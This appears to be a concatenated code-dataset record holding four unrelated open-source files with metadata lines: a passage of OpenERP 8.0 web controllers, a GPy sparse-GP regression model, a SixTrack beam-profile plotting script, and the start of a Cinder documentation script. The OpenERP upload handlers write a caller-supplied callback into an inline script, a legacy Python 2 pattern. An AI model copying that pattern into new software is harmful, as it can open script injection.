[user_menu_id[0]], ['domain'],request.context)[0]['domain']
if domain_string:
menu_domain = ast.literal_eval(domain_string)
return Menus.search(menu_domain, 0, False, False, request.context)
@http.route('/web/menu/load', type='json', auth="user")
def load(self):
""" Loads all menu items (all applications and their sub-menus).
:return: the menu root
:rtype: dict('children': menu_nodes)
"""
Menus = request.session.model('ir.ui.menu')
fields = ['name', 'sequence', 'parent_id', 'action']
menu_root_ids = self.get_user_roots()
menu_roots = Menus.read(menu_root_ids, fields, request.context) if menu_root_ids else []
menu_root = {
'id': False,
'name': 'root',
'parent_id': [-1, ''],
'children': menu_roots,
'all_menu_ids': menu_root_ids,
}
if not menu_roots:
return menu_root
# menus are loaded fully unlike a regular tree view, cause there are a
# limited number of items (752 when all 6.1 addons are installed)
menu_ids = Menus.search([('id', 'child_of', menu_root_ids)], 0, False, False, request.context)
menu_items = Menus.read(menu_ids, fields, request.context)
# adds roots at the end of the sequence, so that they will overwrite
# equivalent menu items from full menu read when put into id:item
# mapping, resulting in children being correctly set on the roots.
menu_items.extend(menu_roots)
menu_root['all_menu_ids'] = menu_ids # includes menu_root_ids!
# make a tree using parent_id
menu_items_map = dict(
(menu_item["id"], menu_item) for menu_item in menu_items)
for menu_item in menu_items:
if menu_item['parent_id']:
parent = menu_item['parent_id'][0]
else:
parent = False
if parent in menu_items_map:
menu_items_map[parent].setdefault(
'children', []).append(menu_item)
# sort by sequence a tree using parent_id
for menu_item in menu_items:
menu_item.setdefault('children', []).sort(
key=operator.itemgetter('sequence'))
return menu_root
@http.route('/web/menu/load_needaction', type='json', auth="user")
def load_needaction(self, menu_ids):
""" Loads needaction counters for specific menu ids.
:return: needaction data
:rtype: dict(menu_id: {'needaction_enabled': boolean, 'needaction_counter': int})
"""
return request.session.model('ir.ui.menu').get_needaction_data(menu_ids, request.context)
class DataSet(http.Controller):
@http.route('/web/dataset/search_read', type='json', auth="user")
def search_read(self, model, fields=False, offset=0, limit=False, domain=None, sort=None):
return self.do_search_read(model, fields, offset, limit, domain, sort)
def do_search_read(self, model, fields=False, offset=0, limit=False, domain=None
, sort=None):
""" Performs a search() followed by a read() (if needed) using the
provided search criteria
:param str model: the name of the model to search on
:param fields: a list of the fields to return in the result records
:type fields: [str]
:param int offset: from which index should the results start being returned
:param int limit: the maximum number of records to return
:param list domain: the search domain for the query
:param list sort: sorting directives
:returns: A structure (dict) with two keys: ids (all the ids matching
the (domain, context) pair) and records (paginated records
matching fields selection set)
:rtype: list
"""
Model = request.session.model(model)
records = Model.search_read(domain, fields, offset or 0, limit or False, sort or False,
request.context)
if not records:
return {
'length': 0,
'records': []
}
if limit and len(records) == limit:
length = Model.search_count(domain, request.context)
else:
length = len(records) + (offset or 0)
return {
'length': length,
'records': records
}
@http.route('/web/dataset/load', type='json', auth="user")
def load(self, model, id, fields):
m = request.session.model(model)
value = {}
r = m.read([id], False, request.context)
if r:
value = r[0]
return {'value': value}
def call_common(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
def _call_kw(self, model, method, args, kwargs):
# Temporary implements future display_name special field for model#read()
if method == 'read' and kwargs.get('context', {}).get('future_display_name'):
if 'display_name' in args[1]:
names = dict(request.session.model(model).name_get(args[0], **kwargs))
args[1].remove('display_name')
records = request.session.model(model).read(*args, **kwargs)
for record in records:
record['display_name'] = \
names.get(record['id']) or "%s#%d" % (model, (record['id']))
return records
if method.startswith('_'):
raise Exception("Access Denied: Underscore prefixed methods cannot be remotely called")
return getattr(request.registry.get(model), method)(request.cr, request.uid, *args, **kwargs)
@http.route('/web/dataset/call', type='json', auth="user")
def call(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
@http.route(['/web/dataset/call_kw', '/web/dataset/call_kw/<path:path>'], type='json', auth="user")
def call_kw(self, model, method, args, kwargs, path=None):
return self._call_kw(model, method, args, kwargs)
@http.route('/web/dataset/call_button', type='json', auth="user")
def call_button(self, model, method, args, domain_id=None, context_id=None):
action = self._call_kw(model, method, args, {})
if isinstance(action, dict) and action.get('type') != '':
return clean_action(action)
return False
@http.route('/web/dataset/exec_workflow', type='json', auth="user")
def exec_workflow(self, model, id, signal):
return request.session.exec_workflow(model, id, signal)
@http.route('/web/dataset/resequence', type='json', auth="user")
def resequence(self, model, ids, field='sequence', offset=0):
""" Re-sequences a number of records in the model, by their ids
The re-sequencing starts at the first model of ``ids``, the sequence
number is incremented by one after each record and starts at ``offset``
:param ids: identifiers of the records to resequence, in the new sequence order
:type ids: list(id)
:param str field: field used for sequence specification, defaults to
"sequence"
:param int offset: sequence number for first record in ``ids``, allows
starting the resequencing from an arbitrary number,
defaults to ``0``
"""
m = request.session.model(model)
if not m.fields_get([field]):
return False
# python 2.6 has no start parameter
for i, id in enumerate(ids):
m.write(id, { field: i + offset })
return True
class View(http.Controller):
@http.route('/web/view/add_custom', type='json', auth="user")
def add_custom(self, view_id, arch):
CustomView = request.session.model('ir.ui.view.custom')
CustomView.create({
'user_id': request.session.uid,
'ref_id': view_id,
'arch': arch
}, request.context)
return {'result': True}
@http.route('/web/view/undo_custom', type='json', auth="user")
def undo_custom(self, view_id, reset=False):
CustomView = request.session.model('ir.ui.view.custom')
vcustom = CustomView.search([('user_id', '=', request.session.uid), ('ref_id' ,'=', view_id)],
0, False, False, request.context)
if vcustom:
if reset:
CustomView.unlink(vcustom, request.context)
else:
CustomView.unlink([vcustom[0]], request.context)
return {'result': True}
return {'result': False}
class TreeView(View):
@http.route('/web/treeview/action', type='json', auth="user")
def action(self, model, id):
return load_actions_from_ir_values(
'action', 'tree_but_open',[(model, id)],
False)
class Binary(http.Controller):
@http.route('/web/binary/image', type='http', auth="user")
def image(self, model, id, field, **kw):
last_update = '__last_update'
Model = request.session.model(model)
headers = [('Content-Type', 'image/png')]
etag = request.httprequest.headers.get('If-None-Match')
hashed_session = hashlib.md5(request.session_id).hexdigest()
retag = hashed_session
id = None if not id else simplejson.loads(id)
if type(id) is list:
id = id[0] # m2o
try:
if etag:
if not id and hashed_session == etag:
return werkzeug.wrappers.Response(status=304)
else:
date = Model.read([id], [last_update], request.context)[0].get(last_update)
if hashlib.md5(date).hexdigest() == etag:
return werkzeug.wrappers.Response(status=304)
if not id:
res = Model.default_get([field], request.context).get(field)
image_base64 = res
else:
res = Model.read([id], [last_update, field], request.context)[0]
retag = hashlib.md5(res.get(last_update)).hexdigest()
image_base64 = res.get(field)
if kw.get('resize'):
resize = kw.get('resize').split(',')
if len(resize) == 2 and int(resize[0]) and int(resize[1]):
width = int(resize[0])
height = int(resize[1])
# resize maximum 500*500
if width > 500: width = 500
if height > 500: height = 500
image_base64 = openerp.tools.image_resize_image(base64_source=image_base64, size=(width, height), encoding='base64', filetype='PNG')
image_data = base64.b64decode(image_base64)
except Exception:
image_data = self.placeholder()
headers.append(('ETag', retag))
headers.append(('Content-Length', len(image_data)))
try:
ncache = int(kw.get('cache'))
headers.append(('Cache-Control', 'no-cache' if ncache == 0 else 'max-age=%s' % (ncache)))
except:
pass
return request.make_response(image_data, headers)
def placeholder(self, image='placeholder.png'):
addons_path = http.addons_manifest['web']['addons_path']
return open(os.path.join(addons_path, 'web', 'static', 'src', 'img', image), 'rb').read()
@http.route('/web/binary/saveas', type='http', auth="user")
@serialize_exception
def saveas(self, model, field, id=None, filename_field=None, **kw):
""" Download link for files stored as binary fields.
If the ``id`` parameter is omitted, fetches the default value for the
binary field (via ``default_get``), otherwise fetches the field for
that precise record.
:param str model: name of the model to fetch the binary from
:param str field: binary field
:param str id: id of the record from which to fetch the binary
:param str filename_field: field holding the file's name, if any
:returns: :class:`werkzeug.wrappers.Response`
"""
Model = request.session.model(model)
fields = [field]
if filename_field:
fields.append(filename_field)
if id:
res = Model.read([int(id)], fields, request.context)[0]
else:
res = Model.default_get(fields, request.context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
return request.not_found()
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return request.make_response(filecontent,
[('Content-Type', 'application/octet-stream'),
('Content-Disposition', content_disposition(filename))])
@http.route('/web/binary/saveas_ajax', type='http', auth="user")
@serialize_exception
def saveas_ajax(self, data, token):
jdata = simplejson.loads(data)
model = jdata['model']
field = jdata['field']
data = jdata['data']
id = jdata.get('id', None)
filename_field = jdata.get('filename_field', None)
context = jdata.get('context', {})
Model = request.session.model(model)
fields = [field]
if filename_field:
fields.append(filename_field)
if data:
res = { field: data }
elif id:
res = Model.read([int(id)], fields, context)[0]
else:
res = Model.default_get(fields, context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
raise ValueError(_("No content found for field '%s' on '%s:%s'") %
(field, model, id))
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return request.make_response(filecontent,
headers=[('Content-Type', 'application/octet-stream'),
('Content-Disposition', content_disposition(filename))],
cookies={'fileToken': token})
@http.route('/web/binary/upload', type='http', auth="user")
@serialize_exception
def upload(self, callback, ufile):
# TODO: might be useful to have a configuration flag for max-length file uploads
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
data = ufile.read()
args = [len(data), ufile.filename,
ufile.content_type, base64.b64encode(data)]
except Exception, e:
args = [False, e.message]
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@http.route('/web/binary/upload_attachment', type='http', auth="user")
@serialize_exception
def upload_attachment(self, callback, model, id, ufile):
Model = request.session.model('ir.attachment')
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
attachment_id = Model.create({
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': model,
'res_id': int(id)
}, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
except Exception:
args = {'error': "Something horrible happened"}
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@http.route([
'/web/binary/company_logo',
'/logo',
'/logo.png',
], type='http', auth="none")
def company_logo(self, dbname=None):
# TODO add etag, refactor to use /image code for etag
uid = None
if request.session.db:
dbname = request.session.db
uid = request.session.uid
elif dbname is None:
dbname = db_monodb()
if not uid:
uid = openerp.SUPERUSER_ID
if not dbname:
image_data = self.placeholder('logo.png')
else:
try:
# create an empty registry
registry = openerp.modules.registry.Registry(dbname)
with registry.cursor() as cr:
cr.execute("""SELECT c.logo_web
FROM res_users u
LEFT JOIN res_company c
ON c.id = u.company_id
WHERE u.id = %s
""", (uid,))
row = cr.fetchone()
if row and row[0]:
image_data = str(row[0]).decode('base64')
else:
image_data = self.placeholder('nologo.png')
except Exception:
image_data = self.placeholder('logo.png')
headers = [
('Content-Type', 'image/png'),
('Content-Length', len(image_data)),
]
return request.make_response(image_data, headers)
class Action(http.Controller):
@http.route('/web/action/load', type='json', auth="user")
def load(self, action_id, do_not_eval=False):
Actions = request.session.model('ir.actions.actions')
value = False
try:
action_id = int(action_id)
except ValueError:
try:
module, xmlid = action_id.split('.', 1)
model, action_id = request.session.model('ir.model.data').get_object_reference(module, xmlid)
assert model.startswith('ir.actions.')
except Exception:
action_id = 0 # force failed read
base_action = Actions.read([action_id], ['type'], request.context)
if base_action:
ctx = {}
action_type = base_action[0]['type']
if action_type == 'ir.actions.report.xml':
ctx.update({'bin_size': True})
ctx.update(request.context)
action = request.session.model(action_type).read([action_id], False, ctx)
if action:
value = clean_action(action[0])
return value
@http.route('/web/action/run', type='json', auth="user")
def run(self, action_id):
return_action = request.session.model('ir.actions.server').run(
[action_id], request.context)
if return_action:
return clean_action(return_action)
else:
return False
class Export(http.Controller):
@http.route('/web/export/formats', type='json', auth="user")
def formats(self):
""" Returns all valid export formats
:returns: for each export format, a pair of identifier and printable name
:rtype: [(str, str)]
"""
return [
{'tag': 'csv', 'label': 'CSV'},
{'tag': 'xls', 'label': 'Excel', 'error': None if xlwt else "XLWT required"},
]
def fields_get(self, model):
Model = request.session.model(model)
fields = Model.fields_get(False, request.context)
return fields
@http.route('/web/export/get_fields', type='json', auth="user")
def get_fields(self, model, prefix='', parent_name= '',
import_compat=True, parent_field_type=None,
exclude=None):
if import_compat and parent_field_type == "many2one":
fields = {}
else:
fields = self.fields_get(model)
if import_compat:
fields.pop('id', None)
else:
fields['.id'] = fields.pop('id', {'string': 'ID'})
fields_sequence = sorted(fields.iteritems(),
key=lambda field: field[1].get('string', ''))
records = []
for field_name, field in fields_sequence:
if import_compat:
if exclude and field_name in exclude:
continue
if field.get('readonly'):
# If none of the field's states unsets readonly, skip the field
if all(dict(attrs).get('readonly', True)
for attrs in field.get('states', {}).values()):
continue
if not field.get('exportable', True):
continue
id = prefix + (prefix and '/'or '') + field_name
name = parent_name + (parent_name and '/' or '') + field['string']
record = {'id': id, 'string': name,
'value': id, 'children': False,
'field_type': field.get('type'),
'required': field.get('required'),
'relation_field': field.get('relation_field')}
records.append(record)
if len(name.split('/')) < 3 and 'relation' in field:
ref = field.pop('relation')
record['value'] += '/id'
record['params'] = {'model': ref, 'prefix': id, 'name': name}
if not import_compat or field['type'] == 'one2many':
# m2m field in import_compat is childless
record['children'] = True
return records
@http.route('/web/export/namelist', type='json', auth="user")
def namelist(self, model, export_id):
# TODO: namelist really has no reason to be in Python (although itertools.groupby helps)
export = request.session.model("ir.exports").read([export_id])[0]
export_fields_list = request.session.model("ir.exports.line").read(
export['export_fields'])
fields_data = self.fields_info(
model, map(operator.itemgetter('name'), export_fields_list))
return [
{'name': field_name, 'label': fields_data[field_name]}
for field_name in fields_data.keys()
]
def fields_info(self, model, export_fields):
info = {}
fields = self.fields_get(model)
if ".id" in export_fields:
fields['.id'] = fields.pop('id', {'string': 'ID'})
# To make fields retrieval more efficient, fetch all sub-fields of a
# given field at the same time. Because the order in the export list is
# arbitrary, this requires ordering all sub-fields of a given field
# together so they can be fetched at the same time
#
# Works the following way:
# * sort the list of fields to export, the default sorting order will
# put the field itself (if present, for xmlid) and all of its
# sub-fields right after it
# * then, group on: the first field of the path (which is the same for
# a field and for its subfields and the length of splitting on the
# first '/', which basically means grouping the field on one side and
# all of the subfields on the other. This way, we have the field (for
# the xmlid) with length 1, and all of the subfields with the same
# base but a length "flag" of 2
# * if we have a normal field (length 1), just add it to the info
# mapping (with its string) as-is
# * otherwise, recursively call fields_info via graft_subfields.
# all graft_subfields does is take the result of fields_info (on the
# field's model) and prepend the current base (current field), which
# rebuilds the whole sub-tree for the field
#
# result: because we're not fetching the fields_get for half the
# database models, fetching a namelist with a dozen fields (including
# relational data) falls from ~6s to ~300ms (on the leads model).
# export lists with no sub-fields (e.g. import_compatible lists with
# no o2m) are even more efficient (from the same 6s to ~170ms, as
# there's a single fields_get to execute)
for (base, length), subfields in itertools.groupby(
sorted(export_fields),
lambda field: (field.split('/', 1)[0], len(field.split('/', 1)))):
subfields = list(subfields)
if length == 2:
# subfields is a seq of $base/*rest, and not loaded yet
info.update(self.graft_subfields(
fields[base]['relation'], base, fields[base]['string'],
subfields
))
elif base in fields:
info[base] = fields[base]['string']
return info
def graft_subfields(self, model, prefix, prefix_string, fields):
export_fields = [field.split('/', 1)[1] for field in fields]
return (
(prefix + '/' + k, prefix_string + '/' + v)
for k, v in self.fields_info(model, export_fields).iteritems())
class ExportFormat(object):
@property
def content_type(self):
""" Provides the format's content type """
raise NotImplementedError()
def filename(self, base):
""" Creates a valid filename for the format (with extension) from the
provided base name (exension-less)
"""
raise NotImplementedError()
def from_data(self, fields, rows):
""" Conversion method from OpenERP's export data to whatever the
current export class outputs
:params list fields: a list of fields to export
:params list rows: a list of records to export
:returns:
:rtype: bytes
"""
raise NotImplementedError()
def base(self, data, token):
model, fields, ids, domain, import_compat = \
operator.itemgetter('model', 'fields', 'ids', 'domain',
'import_compat')(
simplejson.loads(data))
Model = request.session.model(model)
ids = ids or Model.search(domain, 0, False, False, request.context)
field_names = map(operator.itemgetter('name'), fields)
import_data = Model.export_data(ids, field_names, request.context).get('datas',[])
if import_compat:
columns_headers = field_names
else:
columns_headers = [val['label'].strip() for val in fields]
return request.make_response(self.from_data(columns_headers, import_data),
headers=[('Content-Disposition',
content_disposition(self.filename(model))),
('Content-Type', self.content_type)],
cookies={'fileToken': token})
class CSVExport(ExportFormat, http.Controller):
@http.route('/web/export/csv', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'text/csv;charset=utf8'
def filename(self, base):
return base + '.csv'
def from_data(self, fields, rows):
fp = StringIO()
writer = csv.writer(fp, quoting=csv.QUOTE_ALL)
writer.writerow([name.encode('utf-8') for name in fields])
for data in rows:
row = []
for d in data:
if isinstance(d, basestring):
d = d.replace('\n',' ').replace('\t',' ')
try:
d = d.encode('utf-8')
except UnicodeError:
pass
if d is False: d = None
row.append(d)
writer.writerow(row)
fp.seek(0)
data = fp.read()
fp.close()
return data
class ExcelExport(ExportFormat, http.Controller):
@http.route('/web/export/xls', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'application/vnd.ms-excel'
def filename(self, base):
return base + '.xls'
def from_data(self, fields, rows):
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet 1')
for i, fieldname in enumerate(fields):
worksheet.write(0, i, fieldname)
worksheet.col(i).width = 8000 # around 220 pixels
style = xlwt.easyxf('align: wrap yes')
for row_index, row in enumerate(rows):
for cell_index, cell_value in enumerate(row):
if isinstance(cell_value, basestring):
cell_value = re.sub("\r", " ", cell_value)
if cell_value is False: cell_value = None
worksheet.write(row_index + 1, cell_index, cell_value, style)
fp = StringIO()
workbook.save(fp)
fp.seek(0)
data = fp.read()
fp.close()
return data
class Reports(http.Controller):
POLLING_DELAY = 0.25
TYPES_MAPPING = {
'doc': 'application/vnd.ms-word',
'html': 'text/html',
'odt': 'application/vnd.oasis.opendocument.text',
'pdf': 'application/pdf',
'sxw': 'application/vnd.sun.xml.writer',
'xls': 'application/vnd.ms-excel',
}
@http.route('/web/report', type='http', auth="user")
@serialize_exception
def index(self, action, token):
action = simplejson.loads(action)
report_srv = request.session.proxy("report")
context = dict(request.context)
context.update(action["context"])
report_data = {}
report_ids = context.get("active_ids", None)
if 'report_type' in action:
report_data['report_type'] = action['report_type']
if 'datas' in action:
if 'ids' in action['datas']:
report_ids = action['datas'].pop('ids')
report_data.update(action['datas'])
report_id = report_srv.report(
request.session.db, request.session.uid, request.session.password,
action["report_name"], report_ids,
report_data, context)
report_struct = None
while True:
report_struct = report_srv.report_get(
request.session.db, request.session.uid, request.session.password, report_id)
if report_struct["state"]:
break
time.sleep(self.POLLING_DELAY)
report = base64.b64decode(report_struct['result'])
if report_struct.get('code') == 'zlib':
report = zlib.decompress(report)
report_mimetype = self.TYPES_MAPPING.get(
report_struct['format'], 'octet-stream')
file_name = action.get('name', 'report')
if 'name' not in action:
reports = request.session.model('ir.actions.report.xml')
res_id = reports.search([('report_name', '=', action['report_name']),],
0, False, False, context)
if len(res_id) > 0:
file_name = reports.read(res_id[0], ['name'], context)['name']
else:
file_name = action['report_name']
file_name = '%s.%s' % (file_name, report_struct['format'])
return request.make_response(report,
headers=[
('Content-Disposition', content_disposition(file_name)),
('Content-Type', report_mimetype),
('Content-Length', len(report))],
cookies={'fileToken': token})
class Apps(http.Controller):
@http.route('/apps/<app>', auth='user')
def get_app_url(self, req, app):
act_window_obj = request.session.model('ir.actions.act_window')
ir_model_data = request.session.model('ir.model.data')
try:
action_id = ir_model_data.get_object_reference('base', 'open_module_tree')[1]
action = act_window_obj.read(action_id, ['name', 'type', 'res_model', 'view_mode', 'view_type', 'context', 'views', 'domain'])
action['target'] = 'current'
except ValueError:
action = False
try:
app_id = ir_model_data.get_object_reference('base', 'module_%s' % app)[1]
except ValueError:
app_id = False
if action and app_id:
action['res_id'] = app_id
action['view_mode'] = 'form'
action['views'] = [(False, u'form')]
sakey = Session().save_session_action(action)
debug = '?debug' if req.debug else ''
return werkzeug.utils.redirect('/web{0}#sa={1}'.format(debug, sakey))
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
|
trabacus-softapps/openerp-8.0-cc
|
openerp/addons/web/controllers/main.py
|
Python
|
agpl-3.0
| 74,305
|
[
"VisIt"
] |
f891b4a97c81aac9ccd0d7c41a1c921fff636ef69f8dbffab1fbcd67004a6081
|
# Copyright (c) 2017, Zhenwen Dai
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from ..core.sparse_gp_mpi import SparseGP_MPI
from .. import likelihoods
from .. import kern
from ..inference.latent_function_inference.vardtc_md import VarDTC_MD
from GPy.core.parameterization.variational import NormalPosterior
class SparseGPRegressionMD(SparseGP_MPI):
"""Sparse Gaussian Process Regression with Missing Data
This model targets at the use case, in which there are multiple
output dimensions (different dimensions are assumed to be
independent following the same GP prior) and each output dimension
is observed at a different set of inputs. The model takes a
different data format: the inputs and outputs observations of all
the output dimensions are stacked together correspondingly into
two matrices. An extra array is used to indicate the index of
output dimension for each data point. The output dimensions are
indexed using integers from 0 to D-1 assuming there are D output
dimensions.
:param X: input observations.
:type X: numpy.ndarray
:param Y: output observations, each column corresponding to an output dimension.
:type Y: numpy.ndarray
:param indexD: the array containing the index of output dimension for each data point
:type indexD: numpy.ndarray
:param kernel: a GPy kernel for GP of individual output dimensions ** defaults to RBF **
:type kernel: GPy.kern.Kern or None
:param Z: inducing inputs
:type Z: numpy.ndarray or None
:param num_inducing: a tuple (M, Mr). M is the number of inducing points for GP of individual output dimensions. Mr is the number of inducing points for the latent space.
:type num_inducing: (int, int)
:param boolean individual_Y_noise: whether individual output dimensions have their own noise variance or not, boolean
:param str name: the name of the model
"""
def __init__(self, X, Y, indexD, kernel=None, Z=None, num_inducing=10, normalizer=None, mpi_comm=None, individual_Y_noise=False, name='sparse_gp'):
assert len(Y.shape)==1 or Y.shape[1]==1
self.individual_Y_noise = individual_Y_noise
self.indexD = indexD
output_dim = int(np.max(indexD))+1
num_data, input_dim = X.shape
# kern defaults to rbf (plus white for stability)
if kernel is None:
kernel = kern.RBF(input_dim)# + kern.white(input_dim, variance=1e-3)
# Z defaults to a subset of the data
if Z is None:
i = np.random.permutation(num_data)[:min(num_inducing, num_data)]
Z = X.view(np.ndarray)[i].copy()
else:
assert Z.shape[1] == input_dim
if individual_Y_noise:
likelihood = likelihoods.Gaussian(variance=np.array([np.var(Y[indexD==d]) for d in range(output_dim)])*0.01)
else:
likelihood = likelihoods.Gaussian(variance=np.var(Y)*0.01)
infr = VarDTC_MD()
super(SparseGPRegressionMD, self).__init__(X, Y, Z, kernel, likelihood, inference_method=infr, normalizer=normalizer, mpi_comm=mpi_comm, name=name)
self.output_dim = output_dim
def parameters_changed(self):
self.posterior, self._log_marginal_likelihood, self.grad_dict = self.inference_method.inference(self.kern, self.X, self.Z, self.likelihood, self.Y, self.indexD, self.output_dim, self.Y_metadata)
self.likelihood.update_gradients(self.grad_dict['dL_dthetaL'] if self.individual_Y_noise else self.grad_dict['dL_dthetaL'].sum())
self.kern.update_gradients_diag(self.grad_dict['dL_dKdiag'], self.X)
kerngrad = self.kern.gradient.copy()
self.kern.update_gradients_full(self.grad_dict['dL_dKnm'], self.X, self.Z)
kerngrad += self.kern.gradient
self.kern.update_gradients_full(self.grad_dict['dL_dKmm'], self.Z, None)
self.kern.gradient += kerngrad
#gradients wrt Z
self.Z.gradient = self.kern.gradients_X(self.grad_dict['dL_dKmm'], self.Z)
self.Z.gradient += self.kern.gradients_X(self.grad_dict['dL_dKnm'].T, self.Z, self.X)
|
SheffieldML/GPy
|
GPy/models/sparse_gp_regression_md.py
|
Python
|
bsd-3-clause
| 4,136
|
[
"Gaussian"
] |
480c15f1584a37a3387987019c9998ecc29a284280539d1080f5b41bad42bbd6
|
import math
from matplotlib import pyplot as plt
from matplotlib.colors import LogNorm
from matplotlib.ticker import LogLocator
from scipy.optimize import curve_fit
import numpy as np
iFilename = 'cry_entrance.dat'
# Reading file -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
with open(iFilename,'r') as readFile:
for line in readFile:
partID, turn, collimator, mat, ishit, isabs, x, xp, y, yp, p = np.genfromtxt(readFile, unpack=True)
# Building histograms ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
binx = 200
biny = 200
binang = 200
f0 = plt.figure(0)
plt.suptitle('Beam profile @ crystal entrance')
plt.subplot(2,2,1)
plt.hist(x, bins=binx)
plt.title('x profile')
plt.xlabel('x [m]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
plt.subplot(2,2,2)
plt.hist(y, bins=biny)
plt.title('y profile')
plt.xlabel('y [m]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
plt.subplot(2,2,3)
plt.hist(xp, bins=binang)
plt.title('x\' profile')
plt.xlabel('x\' [rad]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
plt.subplot(2,2,4)
plt.hist(yp, bins=binang)
plt.title('y\' profile')
plt.xlabel('y\' [rad]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
f0.show()
f0.set_size_inches((13, 9), forward=False)
f0.tight_layout(rect=[0, 0.03, 1, 0.95])
f0.savefig('profiles1d_entrance.png')
f1 = plt.figure(1)
plt.hist2d(x, y, bins=[binx, biny], norm=LogNorm())
plt.title('2d profile @ crystal entrance')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.grid(color='gray', linestyle='--', linewidth=0.5)
plt.colorbar(ticks = LogLocator(subs=range(10)))
f1.show()
f1.show()
f1.set_size_inches((9, 6), forward=False)
f1.tight_layout(rect=[0, 0.03, 1, 0.95])
f1.savefig('profile2d_entrance.png')
f2 = plt.figure(2)
plt.hist2d(x, xp, bins=[biny, binang], norm=LogNorm())
plt.title('x-x\' phase space @ crystal entrance')
plt.xlabel('x [m]')
plt.ylabel('x\' [rad]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.grid(color='gray', linestyle='--', linewidth=0.5)
plt.colorbar(ticks = LogLocator(subs=range(10)))
f2.show()
f2.set_size_inches((9, 6), forward=False)
f2.tight_layout(rect=[0, 0.03, 1, 0.95])
f2.savefig('phasespacex_entrance.png')
f3 = plt.figure(3)
plt.hist2d(y, yp, bins=[biny, binang], norm=LogNorm())
plt.title('y-y\' phase space @ crystal entrance')
plt.xlabel('y [m]')
plt.ylabel('y\' [rad]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.grid(color='gray', linestyle='--', linewidth=0.5)
plt.colorbar(ticks = LogLocator(subs=range(10)))
f3.show()
f3.set_size_inches((9, 6), forward=False)
f3.tight_layout(rect=[0, 0.03, 1, 0.95])
f3.savefig('phasespacey_entrance.png')
input()
plt.close('all')
|
SixTrack/SixTrack
|
test/collimation_cry_si_vr_ver_b2/EntCheck.py
|
Python
|
lgpl-2.1
| 3,261
|
[
"CRYSTAL"
] |
e9d254b4faa336af8ef26831032325a614876d8205dd6f064aa771813427bd18
|
#! /usr/bin/python
"""
Copyright (c) 2015, The Cinder Project, All rights reserved.
This code is intended for use with the Cinder C++ library: http://libcinder.org
Redistribution and use in source and binary forms, with or without modification, are permitted provided that
the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and
the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and
the following disclaimer in the documentation and/or other materials provided with the distribution.
z
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
AUTHOR: Greg Kepler | gkepler@gmail.com
"""
# -*- coding: utf-8 -*-
import sys
import codecs
import re
import xml.etree.ElementTree as ET
import json
import os
import shutil
import stat
import argparse
import posixpath
from datetime import datetime
from difflib import SequenceMatcher as SM
from posixpath import join as urljoin
# Third party in libs folder
sys.path.append("libs/")
from bs4 import BeautifulSoup, Tag, NavigableString, Comment
from pystache.renderer import Renderer, Loader
# static path vars
BASE_PATH = os.path.dirname(os.path.realpath(__file__)) + os.sep
HTML_ROOT_DIR = 'html'
XML_SOURCE_PATH = BASE_PATH + 'xml' + os.sep
HTML_DEST_PATH = BASE_PATH + HTML_ROOT_DIR + os.sep
HTML_SOURCE_PATH = BASE_PATH + 'htmlsrc' + os.sep
TEMPLATE_PATH = BASE_PATH + 'htmlsrc' + os.sep + "_templates" + os.sep
PARENT_DIR = BASE_PATH.split(os.sep + 'docs')[0]
TAG_FILE_PATH = "doxygen" + os.sep + "cinder.tag"
